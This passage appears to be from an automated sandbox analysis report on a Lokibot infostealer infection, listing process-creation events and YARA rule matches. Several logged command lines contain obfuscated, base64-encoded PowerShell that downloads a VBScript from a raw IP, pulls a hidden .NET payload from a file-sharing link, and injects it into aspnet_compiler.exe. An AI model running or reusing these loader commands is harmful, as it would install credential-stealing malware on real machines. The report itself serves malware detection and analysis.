IuadesativadoIua,Iu'+'adesativadoIua,IuadesativadoIua,IuadesativadoIu'+'a,IuadesativadoIu'+'a,IuadesativadoIua,I'+'ua1Iua,IuadesativadoIua)'+');') -CReplace([ChAr]73+[ChAr]117+[ChAr]97),[ChAr]39 -CReplace([ChAr]51+[ChAr]90+[ChAr]68),[ChAr]36-CReplace ([ChAr]122+[ChAr]119+[ChAr]118),[ChAr]124))"
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sySTeM32\wIndOWSpoweRShEll\V1.0\POwERsHeLl.EXE" "pOWersHELl -EX byPass -Nop -W 1 -C DEVICecrEdEntialDEploymenT ; invoke-eXPrEssIOn($(invOKE-eXPrEsSION('[sYStem.TEXt.ENcODiNg]'+[chAR]58+[ChAR]58+'UtF8.gETstrInG([sYstem.cONVErt]'+[cHAr]58+[ChAR]0x3a+'frOMBASE64STriNg('+[ChAr]34+'JHBmWHRRICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbUJlcmRlRmluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpUa1puTFpUZ1RCLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZrLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxEQyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFwT1l2aWhjLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5qUmNkQ2pXKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiT3JjWUR2USIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZXNwQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUEJvc0lTUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkcGZYdFE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzMzL3NlZW15YmVzdHRoaW5nc3doaWNoY2FsbHlvdWJhYnlnaXJsd2hpY2hnaXZldWhvdGNoaWNrcy50SUYiLCIkRW5WOkFQUERBVEFcc2VlbXliZXN0dGhpbmdzd2hpY2hjYWxseW91YmFieWdpcmx3aGljaGdpdmV1aC52YlMiLDAsMCk7U3RBUnQtU0xlRVAoMyk7SUVYICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlblY6QVBQREFUQVxzZWVteWJlc3R0aGluZ3N3aGljaGNhbGx5b3ViYWJ5Z2lybHdoaWNoZ2l2ZXVoLnZiUyI='+[ChaR]34+'))')))"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX byPass -Nop -W 1 -C DEVICecrEdEntialDEploymenTJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'aWVYICggKCgnM1pEaW1hZ2VVcmwgPSBJdWFodHRwczovLzEwMTcuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWxla2V5PTJBYV9iV285UmV1NDV0N0JVMWtWZ3NkOXBUOXBnU1NsdlN0R3JuVElDZkZobVQnKydLJysnajNMQzZTUXRJY09jX1QzNXcmcGtfdmlkPWZkNGY2MTQnKydiYjIwJysnOWM2MmMxNzMwJysnOTQ1MTc2YTA5MCcrJzRmIEl1JysnYTszWkR3ZWJDbCcrJ2llbnQgPSBOZXctT2JqZWN0IFN5cycrJ3RlbS5OJysnZXQuV2ViQ2xpZW50OzNaRGltYWdlQnl0ZXMgPSAzWkR3ZWJDbGllbnQuRG93bmxvYWREYXRhKDNaRGltYWdlVXJsKTszWkRpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkcnKydldFN0cmluZycrJygzWkRpbWFnZUJ5dGVzKTszWkRzdGFydEZsJysnYWcgPSBJdWE8PEJBU0U2NF9TVEFSVD4+SXVhOzNaRGVuZEZsYWcgPSBJdWE8PEJBU0U2NF9FTkQ+Pkl1JysnYTszWkRzdGFydEluZGV4ID0gM1pEaW1hZ2UnKydUZXh0LkluZGV4T2YoM1pEc3RhcnRGbGFnKTszWkRlbmRJbmRleCA9IDNaRGltYWdlVGV4dC5JbmRleE9mKDNaRGVuZEZsJysnYWcpOzNaRHN0YXJ0SW5kZXggLWdlIDAgLWFuZCAzWkRlbmRJbmRleCAtZ3QgM1pEc3RhcnRJbmRleDszWkRzdGFydEluZGV4ICs9IDNaRHN0YXJ0RmxhZy5MZW5ndGg7M1pEYmFzZTY0TGVuZ3RoID0gM1onKydEZW5kSW5kZXggLSAzWkRzdGFydEluZGV4JysnOzNaJysnRGJhc2U2JysnNENvbW1hbmQgPSAzWkRpbWFnZVRleHQuU3Vic3RyaW5nKDNaRHN0YXJ0SW5kZXgsIDNaRGInKydhc2U2NExlbmcnKyd0aCk7M1pEYmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoM1pEYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIHp3diBGb3JFYWNoLU9iamVjdCB7IDNaRF8gJysnfSlbLScrJzEuLi0oM1pEYmFzZTY0Q29tbWFuZC5MZW5ndCcrJ2gpXTszWkRjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKDNaRGJhc2U2NFJldmVyc2UnKydkKTszWkRsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGUnKydjdGlvbi5Bc3NlbWJseV06OkxvYWQoM1pEY29tbWFuZEJ5dGUnKydzKTszWkR2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZScrJ10uR2V0TWV0aG9kKEl1YVZBSUl1YSk7JysnM1pEdmFpTWV0aG9kLkludm9rZSgzWkRudWxsLCBAKEl1YXR4dC5LTEdPTC8zMy82MzEuMzQyLjMuMjkxLy86cCcrJ3R0aEl1YScrJywgSXVhZCcrJ2VzYXRpdmFkb0l1YSwgSXVhZGVzYXRpdmFkb0l1YSwgSXVhZGVzYXRpdicrJ2Fkb0l1YSwgSXVhYXNwbmV0X2NvbXBpbGVySXVhLCBJdWFkZXNhdGknKyd2YWRvSXVhLCBJdWFkZXNhdGl2YWRvSXVhLEl1JysnYWRlc2F0aXZhZG9JdWEsSXVhZGVzYXRpdmFkb0l1YSxJdWFkZXNhdGl2YWRvSXUnKydhLEl1YWRlc2F0aXZhZG9JdScrJ2EsSXVhZGVzYXRpdmFkb0l1YSxJJysndWExSXVhLEl1YWRlc2F0aXZhZG9JdWEpJysnKTsnKSAgLUNSZXBsYWNlKFtDaEFyXTczK1tDaEFyXTExNytbQ2hBcl05NyksW0NoQXJdMzkgLUNSZXBsYWNlKFtDaEFyXTUxK1tDaEFyXTkwK1tDaEFyXTY4KSxbQ2hBcl0zNi1DUmVwbGFjZSAgKFtDaEFyXTEyMitbQ2hBcl0xMTkrW0NoQXJdMTE4KSxbQ2hBcl0xMjQpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "ieX ( (('3ZDimageUrl = Iuahttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmT'+'K'+'j3LC6SQtIcOc_T35w&pk_vid=fd4f614'+'bb20'+'9c62c1730'+'945176a090'+'4f Iu'+'a;3ZDwebCl'+'ient = New-Object Sys'+'tem.N'+'et.WebClient;3ZDimageBytes = 3ZDwebClient.DownloadData(3ZDimageUrl);3ZDimageText = [System.Text.Encoding]::UTF8.G'+'etString'+'(3ZDimageBytes);3ZDstartFl'+'ag = Iua<<BASE64_START>>Iua;3ZDendFlag = Iua<<BASE64_END>>Iu'+'a;3ZDstartIndex = 3ZDimage'+'Text.IndexOf(3ZDstartFlag);3ZDendIndex = 3ZDimageText.IndexOf(3ZDendFl'+'ag);3ZDstartIndex -ge 0 -and 3ZDendIndex -gt 3ZDstartIndex;3ZDstartIndex += 3ZDstartFlag.Length;3ZDbase64Length = 3Z'+'DendIndex - 3ZDstartIndex'+';3Z'+'Dbase6'+'4Command = 3ZDimageText.Substring(3ZDstartIndex, 3ZDb'+'ase64Leng'+'th);3ZDbase64Reversed = -join (3ZDbase64Command.ToCharArray() zwv ForEach-Object { 3ZD_ '+'})[-'+'1..-(3ZDbase64Command.Lengt'+'h)];3ZDcommandBytes = [System.Convert]::FromBase64String(3ZDbase64Reverse'+'d);3ZDloadedAssembly = [System.Refle'+'ction.Assembly]::Load(3ZDcommandByte'+'s);3ZDvaiMethod = [dnlib.IO.Home'+'].GetMethod(IuaVAIIua);'+'3ZDvaiMethod.Invoke(3ZDnull, @(Iuatxt.KLGOL/33/631.342.3.291//:p'+'tthIua'+', Iuad'+'esativadoIua, IuadesativadoIua, Iuadesativ'+'adoIua, Iuaaspnet_compilerIua, Iuadesati'+'vadoIua, IuadesativadoIua,Iu'+'adesativadoIua,IuadesativadoIua,IuadesativadoIu'+'a,IuadesativadoIu'+'a,IuadesativadoIua,I'+'ua1Iua,IuadesativadoIua)'+');') -CReplace([ChAr]73+[ChAr]117+[ChAr]97),[ChAr]39 -CReplace([ChAr]51+[ChAr]90+[ChAr]68),[ChAr]36-CReplace ([ChAr]122+[ChAr]119+[ChAr]118),[ChAr]124))"Jump to behavior
                Source: 9.2.powershell.exe.6a69e98.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 9.2.powershell.exe.6a69e98.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 9.2.powershell.exe.6a69e98.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 9.2.powershell.exe.6a69e98.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 13.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 13.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 13.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 13.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 13.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 13.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 13.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 13.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 13.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 13.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 9.2.powershell.exe.6a69e98.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 9.2.powershell.exe.6a69e98.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 9.2.powershell.exe.6a69e98.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 9.2.powershell.exe.6a69e98.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 9.2.powershell.exe.6a69e98.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 00000009.00000002.1951506450.0000000006A0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 00000009.00000002.1951506450.0000000006A0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 00000009.00000002.1951506450.0000000006A0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: Process Memory Space: powershell.exe PID: 2504, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 5820, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: Process Memory Space: powershell.exe PID: 5820, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: aspnet_compiler.exe PID: 2736, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'aWVYICggKCgnM1pEaW1hZ2VVcmwgPSBJdWFodHRwczovLzEwMTcuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWxla2V5PTJBYV9iV285UmV1NDV0N0JVMWtWZ3NkOXBUOXBnU1NsdlN0R3JuVElDZkZobVQnKydLJysnajNMQzZTUXRJY09jX1QzNXcmcGtfdmlkPWZkNGY2MTQnKydiYjIwJysnOWM2MmMxNzMwJysnOTQ1MTc2YTA5MCcrJzRmIEl1JysnYTszWkR3ZWJDbCcrJ2llbnQgPSBOZXctT2JqZWN0IFN5cycrJ3RlbS5OJysnZXQuV2ViQ2xpZW50OzNaRGltYWdlQnl0ZXMgPSAzWkR3ZWJDbGllbnQuRG93bmxvYWREYXRhKDNaRGltYWdlVXJsKTszWkRpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkcnKydldFN0cmluZycrJygzWkRpbWFnZUJ5dGVzKTszWkRzdGFydEZsJysnYWcgPSBJdWE8PEJBU0U2NF9TVEFSVD4+SXVhOzNaRGVuZEZsYWcgPSBJdWE8PEJBU0U2NF9FTkQ+Pkl1JysnYTszWkRzdGFydEluZGV4ID0gM1pEaW1hZ2UnKydUZXh0LkluZGV4T2YoM1pEc3RhcnRGbGFnKTszWkRlbmRJbmRleCA9IDNaRGltYWdlVGV4dC5JbmRleE9mKDNaRGVuZEZsJysnYWcpOzNaRHN0YXJ0SW5kZXggLWdlIDAgLWFuZCAzWkRlbmRJbmRleCAtZ3QgM1pEc3RhcnRJbmRleDszWkRzdGFydEluZGV4ICs9IDNaRHN0YXJ0RmxhZy5MZW5ndGg7M1pEYmFzZTY0TGVuZ3RoID0gM1onKydEZW5kSW5kZXggLSAzWkRzdGFydEluZGV4JysnOzNaJysnRGJhc2U2JysnNENvbW1hbmQgPSAzWkRpbWFnZVRleHQuU3Vic3RyaW5nKDNaRHN0YXJ0SW5kZXgsIDNaRGInKydhc2U2NExlbmcnKyd0aCk7M1pEYmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoM1pEYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIHp3diBGb3JFYWNoLU9iamVjdCB7IDNaRF8gJysnfSlbLScrJzEuLi0oM1pEYmFzZTY0Q29tbWFuZC5MZW5ndCcrJ2gpXTszWkRjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKDNaRGJhc2U2NFJldmVyc2UnKydkKTszWkRsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGUnKydjdGlvbi5Bc3NlbWJseV06OkxvYWQoM1pEY29tbWFuZEJ5dGUnKydzKTszWkR2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZScrJ10uR2V0TWV0aG9kKEl1YVZBSUl1YSk7JysnM1pEdmFpTWV0aG9kLkludm9rZSgzWkRudWxsLCBAKEl1YXR4dC5LTEdPTC8zMy82MzEuMzQyLjMuMjkxLy86cCcrJ3R0aEl1YScrJywgSXVhZCcrJ2VzYXRpdmFkb0l1YSwgSXVhZGVzYXRpdmFkb0l1YSwgSXVhZGVzYXRpdicrJ2Fkb0l1YSwgSXVhYXNwbmV0X2NvbXBpbGVySXVhLCBJdWFkZXNhdGknKyd2YWRvSXVhLCBJdWFkZXNhdGl2YWRvSXVhLEl1JysnYWRlc2F0aXZhZG9JdWEsSXVhZGVzYXRpdmFkb0l1YSxJdWFkZXNhdGl2YWRvSXUnKydhLEl1YWRlc2F0aXZhZG9JdScrJ2EsSXVhZGVzYXRpdmFkb0l1YSxJJysndWExSXVhLEl1YWRlc2F0aXZhZG9JdWEpJysnKTsnKSAgLUNSZXBsYWNlKFtDaEFyXTczK1tDaEFyXTExNytbQ2hBcl05NyksW0NoQXJdMzkgLUNSZXBsYWNlKFtDaEFyXTUxK1tDaEFyXTkwK1tDaEFyXTY4KSxbQ2hBcl0zNi1DUmVwbGFjZSAgKFtDaEFyXTEyMitbQ2hBcl0xMTkrW0NoQXJdMTE4KSxbQ2hBcl0xMjQpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'aWVYICggKCgnM1pEaW1hZ2VVcmwgPSBJdWFodHRwczovLzEwMTcuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWxla2V5PTJBYV9iV285UmV1NDV0N0JVMWtWZ3NkOXBUOXBnU1NsdlN0R3JuVElDZkZobVQnKydLJysnajNMQzZTUXRJY09jX1QzNXcmcGtfdmlkPWZkNGY2MTQnKydiYjIwJysnOWM2MmMxNzMwJysnOTQ1MTc2YTA5MCcrJzRmIEl1JysnYTszWkR3ZWJDbCcrJ2llbnQgPSBOZXctT2JqZWN0IFN5cycrJ3RlbS5OJysnZXQuV2ViQ2xpZW50OzNaRGltYWdlQnl0ZXMgPSAzWkR3ZWJDbGllbnQuRG93bmxvYWREYXRhKDNaRGltYWdlVXJsKTszWkRpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkcnKydldFN0cmluZycrJygzWkRpbWFnZUJ5dGVzKTszWkRzdGFydEZsJysnYWcgPSBJdWE8PEJBU0U2NF9TVEFSVD4+SXVhOzNaRGVuZEZsYWcgPSBJdWE8PEJBU0U2NF9FTkQ+Pkl1JysnYTszWkRzdGFydEluZGV4ID0gM1pEaW1hZ2UnKydUZXh0LkluZGV4T2YoM1pEc3RhcnRGbGFnKTszWkRlbmRJbmRleCA9IDNaRGltYWdlVGV4dC5JbmRleE9mKDNaRGVuZEZsJysnYWcpOzNaRHN0YXJ0SW5kZXggLWdlIDAgLWFuZCAzWkRlbmRJbmRleCAtZ3QgM1pEc3RhcnRJbmRleDszWkRzdGFydEluZGV4ICs9IDNaRHN0YXJ0RmxhZy5MZW5ndGg7M1pEYmFzZTY0TGVuZ3RoID0gM1onKydEZW5kSW5kZXggLSAzWkRzdGFydEluZGV4JysnOzNaJysnRGJhc2U2JysnNENvbW1hbmQgPSAzWkRpbWFnZVRleHQuU3Vic3RyaW5nKDNaRHN0YXJ0SW5kZXgsIDNaRGInKydhc2U2NExlbmcnKyd0aCk7M1pEYmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoM1pEYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIHp3diBGb3JFYWNoLU9iamVjdCB7IDNaRF8gJysnfSlbLScrJzEuLi0oM1pEYmFzZTY0Q29tbWFuZC5MZW5ndCcrJ2gpXTszWkRjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKDNaRGJhc2U2NFJldmVyc2UnKydkKTszWkRsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGUnKydjdGlvbi5Bc3NlbWJseV06OkxvYWQoM1pEY29tbWFuZEJ5dGUnKydzKTszWkR2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZScrJ10uR2V0TWV0aG9kKEl1YVZBSUl1YSk7JysnM1pEdmFpTWV0aG9kLkludm9rZSgzWkRudWxsLCBAKEl1YXR4dC5LTEdPTC8zMy82MzEuMzQyLjMuMjkxLy86cCcrJ3R0aEl1YScrJywgSXVhZCcrJ2VzYXRpdmFkb0l1YSwgSXVhZGVzYXRpdmFkb0l1YSwgSXVhZGVzYXRpdicrJ2Fkb0l1YSwgSXVhYXNwbmV0X2NvbXBpbGVySXVhLCBJdWFkZXNhdGknKyd2YWRvSXVhLCBJdWFkZXNhdGl2YWRvSXVhLEl1JysnYWRlc2F0aXZhZG9JdWEsSXVhZGVzYXRpdmFkb0l1YSxJdWFkZXNhdGl2YWRvSXUnKydhLEl1YWRlc2F0aXZhZG9JdScrJ2EsSXVhZGVzYXRpdmFkb0l1YSxJJysndWExSXVhLEl1YWRlc2F0aXZhZG9JdWEpJysnKTsnKSAgLUNSZXBsYWNlKFtDaEFyXTczK1tDaEFyXTExNytbQ2hBcl05NyksW0NoQXJdMzkgLUNSZXBsYWNlKFtDaEFyXTUxK1tDaEFyXTkwK1tDaEFyXTY4KSxbQ2hBcl0zNi1DUmVwbGFjZSAgKFtDaEFyXTEyMitbQ2hBcl0xMTkrW0NoQXJdMTE4KSxbQ2hBcl0xMjQpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0463951E9_2_0463951E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0040549C13_2_0040549C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_004029D413_2_004029D4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 0041219C appears 45 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 00405B6F appears 42 times
                Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: Commandline size = 2022
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 2422
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: Commandline size = 2022Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 2422Jump to behavior
                Source: 9.2.powershell.exe.6a69e98.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 9.2.powershell.exe.6a69e98.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 9.2.powershell.exe.6a69e98.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 9.2.powershell.exe.6a69e98.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 13.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 13.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 13.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 13.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 13.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 13.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
